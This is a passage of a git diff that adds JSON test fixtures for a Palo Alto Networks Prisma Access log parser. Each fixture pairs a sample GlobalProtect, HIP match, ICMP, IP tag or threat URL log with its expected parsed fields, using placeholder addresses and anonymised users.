+      "type": "globalprotect"
+    },
+    "host": {
+      "hostname": "machine_name2",
+      "name": "machine_name2",
+      "os": {
+        "type": "Intel Mac OS"
+      }
+    },
+    "log": {
+      "logger": "globalprotect"
+    },
+    "network": {
+      "type": "ipsec"
+    },
+    "observer": {
+      "product": "PAN-OS",
+      "type": "LF",
+      "vendor": "Palo Alto Networks",
+      "version": "2.0"
+    },
+    "paloalto": {
+      "PanOSQuarantineReason": "Malicious Traffic",
+      "authentication": {
+        "method": "RADIUS"
+      },
+      "connection": {
+        "method": "connect_method_list-1",
+        "stage": "connected"
+      }
+    },
+    "related": {
+      "hosts": [
+        "machine_name2"
+      ],
+      "user": [
+        "xxxxx"
+      ]
+    },
+    "source": {
+      "user": {
+        "domain": "xxxxx",
+        "name": "xxxxx"
+      }
+    },
+    "user": {
+      "domain": "xxxxx",
+      "name": "xxxxx"
+    }
+  }
+}
\ No newline at end of file
diff --git a/Palo Alto Networks/paloalto-prima-access/tests/globalprotect_csv.json b/Palo Alto Networks/paloalto-prima-access/tests/globalprotect_csv.json
new file mode 100644
index 000000000..65f2b6940
--- /dev/null
+++ b/Palo Alto Networks/paloalto-prima-access/tests/globalprotect_csv.json	
@@ -0,0 +1,72 @@
+{
+  "input": {
+    "message": "1,2020/12/08 14:30:55,011111114444,GLOBALPROTECT,0,2305,2020/12/08 13:30:55,vsys1,gw-auth,login,Other,,user,FR,AAAABBBBB,1.2.3.4,0.0.0.0,0.0.0.0,0.0.0.0,aaaaaaaa-bbbb-cccc-dddd-eeeeeeeeeee,ABCDEFG,5.1.4,Windows,\"Microsoft Windows 10 Pro , 64-bit\",1,,,\"\",success,,0,user-logon,0,gw1,1234567,0x8000000000000000"
+  },
+  "expected": {
+    "message": "1,2020/12/08 14:30:55,011111114444,GLOBALPROTECT,0,2305,2020/12/08 13:30:55,vsys1,gw-auth,login,Other,,user,FR,AAAABBBBB,1.2.3.4,0.0.0.0,0.0.0.0,0.0.0.0,aaaaaaaa-bbbb-cccc-dddd-eeeeeeeeeee,ABCDEFG,5.1.4,Windows,\"Microsoft Windows 10 Pro , 64-bit\",1,,,\"\",success,,0,user-logon,0,gw1,1234567,0x8000000000000000",
+    "event": {
+      "category": [
+        "session"
+      ],
+      "dataset": "globalprotect",
+      "outcome": "success",
+      "type": [
+        "start"
+      ]
+    },
+    "@timestamp": "2020-12-08T14:30:55Z",
+    "action": {
+      "name": "gw-auth",
+      "outcome": "success",
+      "type": "0"
+    },
+    "host": {
+      "name": "AAAABBBBB",
+      "os": {
+        "version": "Microsoft Windows 10 Pro , 64-bit"
+      }
+    },
+    "log": {
+      "logger": "globalprotect"
+    },
+    "observer": {
+      "product": "PAN-OS",
+      "serial_number": "ABCDEFG"
+    },
+    "paloalto": {
+      "EventID": "gw-auth",
+      "Threat_ContentType": "0",
+      "VirtualLocation": "vsys1",
+      "connection": {
+        "stage": "login"
+      }
+    },
+    "related": {
+      "ip": [
+        "1.2.3.4"
+      ],
+      "user": [
+        "user"
+      ]
+    },
+    "source": {
+      "address": "1.2.3.4",
+      "geo": {
+        "country_iso_code": "FR"
+      },
+      "ip": "1.2.3.4",
+      "user": {
+        "name": "user"
+      }
+    },
+    "user": {
+      "name": "user"
+    },
+    "user_agent": {
+      "os": {
+        "name": "Windows",
+        "version": "Microsoft Windows 10 Pro , 64-bit"
+      }
+    }
+  }
+}
\ No newline at end of file
diff --git a/Palo Alto Networks/paloalto-prima-access/tests/globalprotect_csv_2.json b/Palo Alto Networks/paloalto-prima-access/tests/globalprotect_csv_2.json
new file mode 100644
index 000000000..e4b1d5fab
--- /dev/null
+++ b/Palo Alto Networks/paloalto-prima-access/tests/globalprotect_csv_2.json	
@@ -0,0 +1,74 @@
+{
+  "input": {
+    "message": "1,2023/06/28 14:40:42,015451000032715,GLOBALPROTECT,0,2562,2023/06/28 14:40:42,vsys1,gateway-config-release,configuration,,,example.org\\\\test,EN,2021-02707,88.120.236.74,0.0.0.0,10.0.0.232,0.0.0.0,8f0fd1d3-5d3b-49c3-9bee-247ff89a52f3,DFN3535D,6.0.4,Windows,\"Microsoft Windows 10 Enterprise , 64-bit\",1,,,,success,,0,,0,VPN_GATEWAY,5555555555555555555,0x8000000000000000,2023-06-28T14:40:43.134+02:00,,,,,,0,0,0,0,,VPN-DOM-01,1\n"
+  },
+  "expected": {
+    "message": "1,2023/06/28 14:40:42,015451000032715,GLOBALPROTECT,0,2562,2023/06/28 14:40:42,vsys1,gateway-config-release,configuration,,,example.org\\\\test,EN,2021-02707,88.120.236.74,0.0.0.0,10.0.0.232,0.0.0.0,8f0fd1d3-5d3b-49c3-9bee-247ff89a52f3,DFN3535D,6.0.4,Windows,\"Microsoft Windows 10 Enterprise , 64-bit\",1,,,,success,,0,,0,VPN_GATEWAY,5555555555555555555,0x8000000000000000,2023-06-28T14:40:43.134+02:00,,,,,,0,0,0,0,,VPN-DOM-01,1\n",
+    "event": {
+      "category": [
+        "session"
+      ],
+      "dataset": "globalprotect",
+      "outcome": "success",
+      "type": [
+        "info"
+      ]
+    },
+    "@timestamp": "2023-06-28T12:40:43.134000Z",
+    "action": {
+      "name": "gateway-config-release",
+      "outcome": "success",
+      "type": "0"
+    },
+    "host": {
+      "name": "2021-02707",
+      "os": {
+        "version": "Microsoft Windows 10 Enterprise , 64-bit"
+      }
+    },
+    "log": {
+      "logger": "globalprotect"
+    },
+    "observer": {
+      "product": "PAN-OS",
+      "serial_number": "DFN3535D"
+    },
+    "paloalto": {
+      "EventID": "gateway-config-release",
+      "Threat_ContentType": "0",
+      "VirtualLocation": "vsys1",
+      "connection": {
+        "stage": "configuration"
+      }
+    },
+    "related": {
+      "ip": [
+        "88.120.236.74"
+      ],
+      "user": [
+        "test"
+      ]
+    },
+    "source": {
+      "address": "88.120.236.74",
+      "geo": {
+        "country_iso_code": "EN"
+      },
+      "ip": "88.120.236.74",
+      "user": {
+        "domain": "example.org",
+        "name": "test"
+      }
+    },
+    "user": {
+      "domain": "example.org",
+      "name": "test"
+    },
+    "user_agent": {
+      "os": {
+        "name": "Windows",
+        "version": "Microsoft Windows 10 Enterprise , 64-bit"
+      }
+    }
+  }
+}
\ No newline at end of file
diff --git a/Palo Alto Networks/paloalto-prima-access/tests/hip_match_cef.json b/Palo Alto Networks/paloalto-prima-access/tests/hip_match_cef.json
new file mode 100644
index 000000000..6a0a99b82
--- /dev/null
+++ b/Palo Alto Networks/paloalto-prima-access/tests/hip_match_cef.json	
@@ -0,0 +1,72 @@
+{
+  "input": {
+    "message": "CEF:0|Palo Alto Networks|LF|2.0|HIPMATCH||3|ProfileToken=xxxxx dtz=UTC rt=Mar 01 2021 21:20:13 deviceExternalId=xxxxxxxxxxxxx PanOSIsDuplicateLog=false PanOSIsPrismaNetworks=false PanOSIsPrismaUsers=false PanOSLogExported=false PanOSLogForwarded=true PanOSLogSource=firewall PanOSLogSourceTimeZoneOffset= PanOSSourceDeviceClass= PanOSSourceDeviceOS= sntdom=xxxxx dntdom=xxxxx suser=xxxxx xxxxx duser=xxxxx xxxxx suid= duid= PanOSTenantID=xxxxxxxxxxxxx PanOSUUID= PanOSConfigVersion= start=Mar 01 2021 21:20:13 PanOSSourceUser=xxxxx\\\\xxxxx xxxxx cs3=vsys1 cs3Label=VirtualLocation shost=machine_name1 dhost=machine_name1 cs2=iOS cs2Label=EndpointOSType src=1.1.1.1 dst=1.1.1.1 cat=match_name1 cnt=1 PanOSHipMatchType=HIP Profile externalId=xxxxxxxxxxxxx PanOSDGHierarchyLevel1=12 PanOSDGHierarchyLevel2=0 PanOSDGHierarchyLevel3=0 PanOSDGHierarchyLevel4=0 PanOSVirtualSystemName= dvchost=PA-5220 cn2=1 cn2Label=VirtualSystemID c6a1=xxxx:xxxx:xxxx:xxxx:xxxx:xxxx:xxxx:xxxx c6a1Label=Device IPv6 Address PanOSHostID=xxxxxxxxxxxxxxe777947f-d92e-4815-9222-89438203bc2b PanOSEndpointSerialNumber=xxxxxxxxxxxxxx PanOSSourceDeviceCategory= PanOSSourceDeviceProfile= PanOSSourceDeviceModel= PanOSSourceDeviceVendor= PanOSSourceDeviceOSFamily= PanOSSourceDeviceOSVersion= PanOSSourceDeviceMac= PanOSSourceDeviceHost= PanOSSource= PanOSTimestampDeviceIdentification=Dec PanOSTimeGeneratedHighResolution=Jul 25 2019 23:30:12"
+  },
+  "expected": {
+    "message": "CEF:0|Palo Alto Networks|LF|2.0|HIPMATCH||3|ProfileToken=xxxxx dtz=UTC rt=Mar 01 2021 21:20:13 deviceExternalId=xxxxxxxxxxxxx PanOSIsDuplicateLog=false PanOSIsPrismaNetworks=false PanOSIsPrismaUsers=false PanOSLogExported=false PanOSLogForwarded=true PanOSLogSource=firewall PanOSLogSourceTimeZoneOffset= PanOSSourceDeviceClass= PanOSSourceDeviceOS= sntdom=xxxxx dntdom=xxxxx suser=xxxxx xxxxx duser=xxxxx xxxxx suid= duid= PanOSTenantID=xxxxxxxxxxxxx PanOSUUID= PanOSConfigVersion= start=Mar 01 2021 21:20:13 PanOSSourceUser=xxxxx\\\\xxxxx xxxxx cs3=vsys1 cs3Label=VirtualLocation shost=machine_name1 dhost=machine_name1 cs2=iOS cs2Label=EndpointOSType src=1.1.1.1 dst=1.1.1.1 cat=match_name1 cnt=1 PanOSHipMatchType=HIP Profile externalId=xxxxxxxxxxxxx PanOSDGHierarchyLevel1=12 PanOSDGHierarchyLevel2=0 PanOSDGHierarchyLevel3=0 PanOSDGHierarchyLevel4=0 PanOSVirtualSystemName= dvchost=PA-5220 cn2=1 cn2Label=VirtualSystemID c6a1=xxxx:xxxx:xxxx:xxxx:xxxx:xxxx:xxxx:xxxx c6a1Label=Device IPv6 Address PanOSHostID=xxxxxxxxxxxxxxe777947f-d92e-4815-9222-89438203bc2b PanOSEndpointSerialNumber=xxxxxxxxxxxxxx PanOSSourceDeviceCategory= PanOSSourceDeviceProfile= PanOSSourceDeviceModel= PanOSSourceDeviceVendor= PanOSSourceDeviceOSFamily= PanOSSourceDeviceOSVersion= PanOSSourceDeviceMac= PanOSSourceDeviceHost= PanOSSource= PanOSTimestampDeviceIdentification=Dec PanOSTimeGeneratedHighResolution=Jul 25 2019 23:30:12",
+    "event": {
+      "category": [
+        "network"
+      ],
+      "dataset": "hipmatch",
+      "severity": 3,
+      "start": "2021-03-01T21:20:13Z",
+      "timezone": "UTC",
+      "type": [
+        "info"
+      ]
+    },
+    "@timestamp": "2021-03-01T21:20:13Z",
+    "destination": {
+      "address": "1.1.1.1",
+      "ip": "1.1.1.1",
+      "user": {
+        "name": "xxxxx xxxxx"
+      }
+    },
+    "host": {
+      "hostname": "PA-5220",
+      "id": "xxxxxxxxxxxxx",
+      "name": "PA-5220"
+    },
+    "log": {
+      "hostname": "PA-5220",
+      "logger": "hipmatch"
+    },
+    "observer": {
+      "product": "PAN-OS",
+      "type": "LF",
+      "vendor": "Palo Alto Networks",
+      "version": "2.0"
+    },
+    "paloalto": {
+      "PanOSEndpointSerialNumber": "xxxxxxxxxxxxxx",
+      "VirtualLocation": "vsys1",
+      "VirtualSystemID": "1",
+      "endpoint": {
+        "serial_number": "xxxxxxxxxxxxxx"
+      }
+    },
+    "related": {
+      "hosts": [
+        "PA-5220"
+      ],
+      "ip": [
+        "1.1.1.1"
+      ],
+      "user": [
+        "xxxxx xxxxx"
+      ]
+    },
+    "source": {
+      "address": "1.1.1.1",
+      "ip": "1.1.1.1",
+      "user": {
+        "name": "xxxxx xxxxx"
+      }
+    },
+    "user": {
+      "name": "xxxxx xxxxx"
+    }
+  }
+}
\ No newline at end of file
diff --git a/Palo Alto Networks/paloalto-prima-access/tests/icmp_allow_csv.json b/Palo Alto Networks/paloalto-prima-access/tests/icmp_allow_csv.json
new file mode 100644
index 000000000..e4e153224
--- /dev/null
+++ b/Palo Alto Networks/paloalto-prima-access/tests/icmp_allow_csv.json	
@@ -0,0 +1,77 @@
+{
+  "input": {
+    "message": "<14>Sep 16 10:00:02 PP 1,9/16/19 10:00,1801017000,TRAFFIC,start,2049,9/16/19 10:00,1.2.3.4,4.3.2.1,1.2.3.4,10.0.1.2,PING,,,ping,vsys,AAAAA,Zone1,ethernet1/1,ae2.11,Secure,9/16/19 10:00,24100,3,0,0,0,0,0x500000,icmp,allow,222,222,0,3,9/16/19 10:00,0,any,0,50660388939,0x0,Spain,France,0,3,0,n/a,0,0,0,0,,PA,from-policy,,,0,,0,,N/A,0,0,0,0"
+  },
+  "expected": {
+    "message": "<14>Sep 16 10:00:02 PP 1,9/16/19 10:00,1801017000,TRAFFIC,start,2049,9/16/19 10:00,1.2.3.4,4.3.2.1,1.2.3.4,10.0.1.2,PING,,,ping,vsys,AAAAA,Zone1,ethernet1/1,ae2.11,Secure,9/16/19 10:00,24100,3,0,0,0,0,0x500000,icmp,allow,222,222,0,3,9/16/19 10:00,0,any,0,50660388939,0x0,Spain,France,0,3,0,n/a,0,0,0,0,,PA,from-policy,,,0,,0,,N/A,0,0,0,0",
+    "event": {
+      "action": "allow",
+      "category": [
+        "network"
+      ],
+      "dataset": "traffic",
+      "duration": 0,
+      "outcome": "success",
+      "type": [
+        "start"
+      ]
+    },
+    "@timestamp": "2019-09-16T10:00:00Z",
+    "action": {
+      "name": "allow",
+      "outcome": "success",
+      "type": "start"
+    },
+    "destination": {
+      "address": "4.3.2.1",
+      "bytes": 0,
+      "ip": "4.3.2.1",
+      "nat": {
+        "ip": "10.0.1.2",
+        "port": 0
+      },
+      "packets": 0,
+      "port": 0
+    },
+    "log": {
+      "hostname": "PA",
+      "logger": "traffic"
+    },
+    "network": {
+      "application": "ping",
+      "bytes": 222,
+      "packets": 3,
+      "transport": "icmp"
+    },
+    "observer": {
+      "name": "PA",
+      "product": "PAN-OS",
+      "serial_number": "1801017000"
+    },
+    "paloalto": {
+      "Threat_ContentType": "start",
+      "VirtualLocation": "vsys"
+    },
+    "related": {
+      "ip": [
+        "1.2.3.4",
+        "10.0.1.2",
+        "4.3.2.1"
+      ]
+    },
+    "rule": {
+      "name": "PING"
+    },
+    "source": {
+      "address": "1.2.3.4",
+      "bytes": 222,
+      "ip": "1.2.3.4",
+      "nat": {
+        "ip": "1.2.3.4",
+        "port": 0
+      },
+      "packets": 3,
+      "port": 0
+    }
+  }
+}
\ No newline at end of file
diff --git a/Palo Alto Networks/paloalto-prima-access/tests/iptag_cef.json b/Palo Alto Networks/paloalto-prima-access/tests/iptag_cef.json
new file mode 100644
index 000000000..9d2db872a
--- /dev/null
+++ b/Palo Alto Networks/paloalto-prima-access/tests/iptag_cef.json	
@@ -0,0 +1,59 @@
+{
+  "input": {
+    "message": "CEF:0|Palo Alto Networks|LF|2.0|IPTAG|iptag|3|ProfileToken=xxxxx dtz=UTC rt=Mar 01 2021 21:20:13 deviceExternalId=xxxxxxxxxxxxx PanOSTenantID=xxxxxxxxxxxxx PanOSIsDuplicateLog=false PanOSIsPrismaNetworks=false PanOSIsPrismaUsers=false PanOSLogExported=false PanOSLogForwarded=true PanOSLogSetting= PanOSLogSource=firewall PanOSLogSourceTimeZoneOffset= PanOSRuleMatched= PanOSRuleMatchedUUID= PanOSConfigVersion= start=Mar 01 2021 21:20:13 cs3=vsys1 cs3Label=VirtualLocation src=1.1.1.1 dst=1.1.1.1 PanOSTagName= PanOSEventID=Unregister cnt=1 PanOSMappingTimeout=10 PanOSMappingDataSource=XMLAPI PanOSMappingDataSourceType=XML-API PanOSMappingDataSourceSubType=Unknown externalId=xxxxxxxxxxxxx PanOSDGHierarchyLevel1=18 PanOSDGHierarchyLevel2=0 PanOSDGHierarchyLevel3=0 PanOSDGHierarchyLevel4=0 PanOSVirtualSystemName= dvchost=PA-VM cn2=1 cn2Label=VirtualSystemID PanOSIPSubnetRange= PanOSTimeGeneratedHighResolution=Jul 25 2019 23:30:12"
+  },
+  "expected": {
+    "message": "CEF:0|Palo Alto Networks|LF|2.0|IPTAG|iptag|3|ProfileToken=xxxxx dtz=UTC rt=Mar 01 2021 21:20:13 deviceExternalId=xxxxxxxxxxxxx PanOSTenantID=xxxxxxxxxxxxx PanOSIsDuplicateLog=false PanOSIsPrismaNetworks=false PanOSIsPrismaUsers=false PanOSLogExported=false PanOSLogForwarded=true PanOSLogSetting= PanOSLogSource=firewall PanOSLogSourceTimeZoneOffset= PanOSRuleMatched= PanOSRuleMatchedUUID= PanOSConfigVersion= start=Mar 01 2021 21:20:13 cs3=vsys1 cs3Label=VirtualLocation src=1.1.1.1 dst=1.1.1.1 PanOSTagName= PanOSEventID=Unregister cnt=1 PanOSMappingTimeout=10 PanOSMappingDataSource=XMLAPI PanOSMappingDataSourceType=XML-API PanOSMappingDataSourceSubType=Unknown externalId=xxxxxxxxxxxxx PanOSDGHierarchyLevel1=18 PanOSDGHierarchyLevel2=0 PanOSDGHierarchyLevel3=0 PanOSDGHierarchyLevel4=0 PanOSVirtualSystemName= dvchost=PA-VM cn2=1 cn2Label=VirtualSystemID PanOSIPSubnetRange= PanOSTimeGeneratedHighResolution=Jul 25 2019 23:30:12",
+    "event": {
+      "category": [
+        "network"
+      ],
+      "dataset": "iptag",
+      "severity": 3,
+      "start": "2021-03-01T21:20:13Z",
+      "timezone": "UTC",
+      "type": [
+        "info"
+      ]
+    },
+    "@timestamp": "2021-03-01T21:20:13Z",
+    "action": {
+      "type": "iptag"
+    },
+    "destination": {
+      "address": "1.1.1.1",
+      "ip": "1.1.1.1"
+    },
+    "host": {
+      "hostname": "PA-VM",
+      "id": "xxxxxxxxxxxxx",
+      "name": "PA-VM"
+    },
+    "log": {
+      "hostname": "PA-VM",
+      "logger": "iptag"
+    },
+    "observer": {
+      "product": "PAN-OS",
+      "type": "LF",
+      "vendor": "Palo Alto Networks",
+      "version": "2.0"
+    },
+    "paloalto": {
+      "VirtualLocation": "vsys1",
+      "VirtualSystemID": "1"
+    },
+    "related": {
+      "hosts": [
+        "PA-VM"
+      ],
+      "ip": [
+        "1.1.1.1"
+      ]
+    },
+    "source": {
+      "address": "1.1.1.1",
+      "ip": "1.1.1.1"
+    }
+  }
+}
\ No newline at end of file
diff --git a/Palo Alto Networks/paloalto-prima-access/tests/network_threat_alert_1.json b/Palo Alto Networks/paloalto-prima-access/tests/network_threat_alert_1.json
new file mode 100644
index 000000000..d14918dab
--- /dev/null
+++ b/Palo Alto Networks/paloalto-prima-access/tests/network_threat_alert_1.json	
@@ -0,0 +1,106 @@
+{
+  "input": {
+    "message": "{\"TimeReceived\": \"2024-06-25T21:32:54.000000Z\", \"DeviceSN\": \"000011111112222\", \"LogType\": \"THREAT\", \"Subtype\": \"url\", \"ConfigVersion\": \"10.2\", \"TimeGenerated\": \"2024-06-25T21:30:00.000000Z\", \"SourceAddress\": \"1.2.3.4\", \"DestinationAddress\": \"5.6.7.8\", \"NATSource\": \"4.3.2.1\", \"NATDestination\": \"8.7.6.5\", \"Rule\": \"Rule124\", \"SourceUser\": null, \"DestinationUser\": null, \"Application\": \"ssl\", \"VirtualLocation\": \"vsys1\", \"FromZone\": \"INSIDE\", \"ToZone\": \"OUTSIDE\", \"InboundInterface\": \"ethernet1/2\", \"OutboundInterface\": \"ethernet1/1\", \"LogSetting\": \"Panorama_CDL\", \"SessionID\": 155600, \"RepeatCount\": 1, \"SourcePort\": 51501, \"DestinationPort\": 443, \"NATSourcePort\": 63989, \"NATDestinationPort\": 443, \"Protocol\": \"tcp\", \"Action\": \"alert\", \"URL\": \"www.example.org\", \"URLCategory\": \"computer-and-internet-info\", \"VendorSeverity\": \"Informational\", \"DirectionOfAttack\": \"client to server\", \"SequenceNo\": 7353954110769176067, \"SourceLocation\": \"AZURE-EU-WEST-CBS-BELLEM\", \"DestinationLocation\": \"NL\", \"ContentType\": null, \"PacketID\": 0, \"URLCounter\": 0, \"UserAgent\": null, \"X-Forwarded-For\": null, \"Referer\": null, \"DGHierarchyLevel1\": 982, \"DGHierarchyLevel2\": 117, \"DGHierarchyLevel3\": 0, \"DGHierarchyLevel4\": 0, \"VirtualSystemName\": \"\", \"DeviceName\": \"DN-EUWEST-F2\", \"SourceUUID\": null, \"DestinationUUID\": null, \"HTTPMethod\": \"unknown\", \"IMSI\": 0, \"IMEI\": null, \"ParentSessionID\": 0, \"ParentStarttime\": \"1970-01-01T00:00:00.000000Z\", \"Tunnel\": \"N/A\", \"InlineMLVerdict\": \"unknown\", \"ContentVersion\": \"0\", \"SigFlags\": 0, \"HTTPHeaders\": null, \"URLCategoryList\": \"computer-and-internet-info,low-risk\", \"RuleUUID\": \"cbc3bd5d-e54c-48d7-a6c7-8710bf593e7c\", \"HTTP2Connection\": 0, \"DynamicUserGroupName\": null, \"X-Forwarded-ForIP\": null, \"SourceDeviceCategory\": null, \"SourceDeviceProfile\": null, \"SourceDeviceModel\": null, \"SourceDeviceVendor\": null, \"SourceDeviceOSFamily\": null, \"SourceDeviceOSVersion\": null, \"SourceDeviceHost\": null, \"SourceDeviceMac\": null, \"DestinationDeviceCategory\": null, \"DestinationDeviceProfile\": null, \"DestinationDeviceModel\": null, \"DestinationDeviceVendor\": null, \"DestinationDeviceOSFamily\": null, \"DestinationDeviceOSVersion\": null, \"DestinationDeviceHost\": null, \"DestinationDeviceMac\": null, \"ContainerID\": null, \"ContainerNameSpace\": null, \"ContainerName\": null, \"SourceEDL\": null, \"DestinationEDL\": null, \"HostID\": null, \"EndpointSerialNumber\": null, \"SourceDynamicAddressGroup\": null, \"DestinationDynamicAddressGroup\": null, \"TimeGeneratedHighResolution\": \"2024-06-25T21:30:00.103000Z\", \"NSSAINetworkSliceType\": null}"
+  },
+  "expected": {
+    "message": "{\"TimeReceived\": \"2024-06-25T21:32:54.000000Z\", \"DeviceSN\": \"000011111112222\", \"LogType\": \"THREAT\", \"Subtype\": \"url\", \"ConfigVersion\": \"10.2\", \"TimeGenerated\": \"2024-06-25T21:30:00.000000Z\", \"SourceAddress\": \"1.2.3.4\", \"DestinationAddress\": \"5.6.7.8\", \"NATSource\": \"4.3.2.1\", \"NATDestination\": \"8.7.6.5\", \"Rule\": \"Rule124\", \"SourceUser\": null, \"DestinationUser\": null, \"Application\": \"ssl\", \"VirtualLocation\": \"vsys1\", \"FromZone\": \"INSIDE\", \"ToZone\": \"OUTSIDE\", \"InboundInterface\": \"ethernet1/2\", \"OutboundInterface\": \"ethernet1/1\", \"LogSetting\": \"Panorama_CDL\", \"SessionID\": 155600, \"RepeatCount\": 1, \"SourcePort\": 51501, \"DestinationPort\": 443, \"NATSourcePort\": 63989, \"NATDestinationPort\": 443, \"Protocol\": \"tcp\", \"Action\": \"alert\", \"URL\": \"www.example.org\", \"URLCategory\": \"computer-and-internet-info\", \"VendorSeverity\": \"Informational\", \"DirectionOfAttack\": \"client to server\", \"SequenceNo\": 7353954110769176067, \"SourceLocation\": \"AZURE-EU-WEST-CBS-BELLEM\", \"DestinationLocation\": \"NL\", \"ContentType\": null, \"PacketID\": 0, \"URLCounter\": 0, \"UserAgent\": null, \"X-Forwarded-For\": null, \"Referer\": null, \"DGHierarchyLevel1\": 982, \"DGHierarchyLevel2\": 117, \"DGHierarchyLevel3\": 0, \"DGHierarchyLevel4\": 0, \"VirtualSystemName\": \"\", \"DeviceName\": \"DN-EUWEST-F2\", \"SourceUUID\": null, \"DestinationUUID\": null, \"HTTPMethod\": \"unknown\", \"IMSI\": 0, \"IMEI\": null, \"ParentSessionID\": 0, \"ParentStarttime\": \"1970-01-01T00:00:00.000000Z\", \"Tunnel\": \"N/A\", \"InlineMLVerdict\": \"unknown\", \"ContentVersion\": \"0\", \"SigFlags\": 0, \"HTTPHeaders\": null, \"URLCategoryList\": \"computer-and-internet-info,low-risk\", \"RuleUUID\": \"cbc3bd5d-e54c-48d7-a6c7-8710bf593e7c\", \"HTTP2Connection\": 0, \"DynamicUserGroupName\": null, \"X-Forwarded-ForIP\": null, \"SourceDeviceCategory\": null, \"SourceDeviceProfile\": null, \"SourceDeviceModel\": null, \"SourceDeviceVendor\": null, \"SourceDeviceOSFamily\": null, \"SourceDeviceOSVersion\": null, \"SourceDeviceHost\": null, \"SourceDeviceMac\": null, \"DestinationDeviceCategory\": null, \"DestinationDeviceProfile\": null, \"DestinationDeviceModel\": null, \"DestinationDeviceVendor\": null, \"DestinationDeviceOSFamily\": null, \"DestinationDeviceOSVersion\": null, \"DestinationDeviceHost\": null, \"DestinationDeviceMac\": null, \"ContainerID\": null, \"ContainerNameSpace\": null, \"ContainerName\": null, \"SourceEDL\": null, \"DestinationEDL\": null, \"HostID\": null, \"EndpointSerialNumber\": null, \"SourceDynamicAddressGroup\": null, \"DestinationDynamicAddressGroup\": null, \"TimeGeneratedHighResolution\": \"2024-06-25T21:30:00.103000Z\", \"NSSAINetworkSliceType\": null}",
+    "event": {
+      "action": "alert",
+      "category": [
+        "network"
+      ],
+      "dataset": "threat",
+      "outcome": "success",
+      "type": [
+        "info"
+      ]
+    },
+    "@timestamp": "2024-06-25T21:30:00Z",
+    "action": {
+      "name": "alert",
+      "outcome": "success",
+      "type": "url"
+    },
+    "destination": {
+      "address": "5.6.7.8",
+      "domain": "www.example.org",
+      "geo": {
+        "country_iso_code": "NL"
+      },
+      "ip": "5.6.7.8",
+      "nat": {
+        "ip": "8.7.6.5",
+        "port": 443
+      },
+      "port": 443
+    },
+    "log": {
+      "hostname": "DN-EUWEST-F2",
+      "level": "Informational",
+      "logger": "threat"
+    },
+    "network": {
+      "application": "ssl"
+    },
+    "observer": {
+      "egress": {
+        "interface": {
+          "alias": "OUTSIDE"
+        }
+      },
+      "ingress": {
+        "interface": {
+          "alias": "INSIDE"
+        }
+      },
+      "name": "DN-EUWEST-F2",
+      "product": "PAN-OS",
+      "serial_number": "000011111112222"
+    },
+    "paloalto": {
+      "DGHierarchyLevel1": "982",
+      "DGHierarchyLevel2": "117",
+      "DGHierarchyLevel3": "0",
+      "DGHierarchyLevel4": "0",
+      "DirectionOfAttack": "client to server",
+      "Threat_ContentType": "url",
+      "URLCategory": "computer-and-internet-info",
+      "VirtualLocation": "vsys1"
+    },
+    "related": {
+      "hosts": [
+        "www.example.org"
+      ],
+      "ip": [
+        "1.2.3.4",
+        "4.3.2.1",
+        "5.6.7.8",
+        "8.7.6.5"
+      ]
+    },
+    "rule": {
+      "name": "Rule124",
+      "uuid": "cbc3bd5d-e54c-48d7-a6c7-8710bf593e7c"
+    },
+    "source": {
+      "address": "1.2.3.4",
+      "ip": "1.2.3.4",
+      "nat": {
+        "ip": "4.3.2.1",
+        "port": 63989
+      },
+      "port": 51501
+    },
+    "threat": {
+      "indicator": {
+        "name": "www.example.org"
+      }
+    },
+    "url": {
+      "domain": "www.example.org",
+      "registered_domain": "example.org",
+      "subdomain": "www",
+      "top_level_domain": "org"
+    }
+  }
+}
\ No newline at end of file
diff --git a/Palo Alto Networks/paloalto-prima-access/tests/network_threat_alert_2.json b/Palo Alto Networks/paloalto-prima-access/tests/network_threat_alert_2.json
new file mode 100644
index 000000000..e8c257c69
--- /dev/null
+++ b/Palo Alto Networks/paloalto-prima-access/tests/network_threat_alert_2.json	
@@ -0,0 +1,128 @@
+{
+  "input": {
+    "message": "{\"TimeReceived\": \"2024-06-25T21:30:08.000000Z\", \"DeviceSN\": \"no-serial\", \"LogType\": \"THREAT\", \"Subtype\": \"url\", \"ConfigVersion\": \"10.2\", \"TimeGenerated\": \"2024-06-25T21:30:00.000000Z\", \"SourceAddress\": \"1.2.3.4\", \"DestinationAddress\": \"5.6.7.8\", \"NATSource\": \"4.3.2.1\", \"NATDestination\": \"8.7.6.5\", \"Rule\": \"Global_Internet_Network_Awareness_Service\", \"SourceUser\": \"jdoe@example.org\", \"DestinationUser\": null, \"Application\": \"web-browsing\", \"VirtualLocation\": \"vsys1\", \"FromZone\": \"ZR-EUWS-1\", \"ToZone\": \"untrust\", \"InboundInterface\": \"tunnel.107\", \"OutboundInterface\": \"ethernet1/1\", \"LogSetting\": \"default\", \"SessionID\": 1787364, \"RepeatCount\": 1, \"SourcePort\": 53610, \"DestinationPort\": 80, \"NATSourcePort\": 36160, \"NATDestinationPort\": 80, \"Protocol\": \"tcp\", \"Action\": \"alert\", \"URL\": \"www.example.com/connecttest.txt\", \"URLCategory\": \"computer-and-internet-info\", \"VendorSeverity\": \"Informational\", \"DirectionOfAttack\": \"client to server\", \"SequenceNo\": 7372845116442397960, \"SourceLocation\": \"10.0.0.0-10.255.255.255\", \"DestinationLocation\": \"US\", \"ContentType\": \"text/plain\", \"PacketID\": 0, \"URLCounter\": 1, \"UserAgent\": \"Microsoft NCSI\", \"X-Forwarded-For\": null, \"Referer\": null, \"DGHierarchyLevel1\": 463, \"DGHierarchyLevel2\": 525, \"DGHierarchyLevel3\": 0, \"DGHierarchyLevel4\": 0, \"VirtualSystemName\": \"\", \"DeviceName\": \"ZR-EUWS-1\", \"SourceUUID\": null, \"DestinationUUID\": null, \"HTTPMethod\": \"get\", \"IMSI\": 0, \"IMEI\": null, \"ParentSessionID\": 0, \"ParentStarttime\": \"1970-01-01T00:00:00.000000Z\", \"Tunnel\": \"N/A\", \"InlineMLVerdict\": \"unknown\", \"ContentVersion\": \"0\", \"SigFlags\": 0, \"HTTPHeaders\": null, \"URLCategoryList\": \".msftconnecttest.com,computer-and-internet-info,low-risk\", \"RuleUUID\": \"481a523a-44c0-4c37-b2d5-b6b541d775c3\", \"HTTP2Connection\": 0, \"DynamicUserGroupName\": null, \"X-Forwarded-ForIP\": null, \"SourceDeviceCategory\": null, \"SourceDeviceProfile\": null, \"SourceDeviceModel\": null, \"SourceDeviceVendor\": null, \"SourceDeviceOSFamily\": null, \"SourceDeviceOSVersion\": null, \"SourceDeviceHost\": null, \"SourceDeviceMac\": null, \"DestinationDeviceCategory\": null, \"DestinationDeviceProfile\": null, 